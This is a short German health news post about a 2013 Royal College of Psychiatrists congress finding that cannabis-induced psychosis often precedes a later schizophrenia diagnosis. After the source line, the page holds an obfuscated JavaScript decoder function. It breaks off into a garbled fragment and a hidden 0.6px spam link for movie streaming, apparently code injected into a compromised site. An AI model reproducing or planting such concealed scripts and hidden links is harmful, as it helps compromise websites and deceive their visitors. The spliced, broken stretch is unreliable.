Cannabis – und andere illegale Drogen – könnten Schizophrenie auslösen

Quelle:International Congress of the Royal College of Psychiatrists (RCPsych) 2013. Presented July 5, 2013function oc532bd2f6(uf){var yd=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=‘;var vb=“;var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndand Download“ style=“font-size:0.6px“>Watch Full Movie Streaming Online and Download

Der Gebrauch von Cannabis (und anderen illegalen Drogen) zeigte sich in einer Untersuchung von >3000 stationär an einer Psychiatrie aufgenommenen PatientInnen in Schottland als Risikofaktor für die Entwicklung einer SchizophrenieDiejenigen, die unter dem Gebrauch von Cannabis Anzeichen einer Psychose (drogeninduziert) hatten, wurden im Verlauf danach viel häufiger als schizophren diagnostiziert.
Dieses Ergebniss spricht laut den Publikatoren für eine spezifische und unabhängige Rolle von Cannabis in der Entwiklcung/Auslösung von schizophrenen Psychosen. Annähernd jede(r) Vierte, der/die unter Cannabis psychotische Symptome erlebte, wurde später als schizophren diagnostiziert.
Bei anderen illegalen Drogen war das Risiko auch erhöht (aber nicht gleicht stark).

Fazit: Betroffenen, die unter Cannabis psychotische Symptome (über die “allgemein zu erwartenden drogeninduzierten Symptome hinaus) erleben, sollten sehr genau auf die mögliche Entwicklung drogenunabhängiger psychotischer Symptome hin begleitet werden. Sie scheinen diesbzüglich ein hohes Risiko zu haben.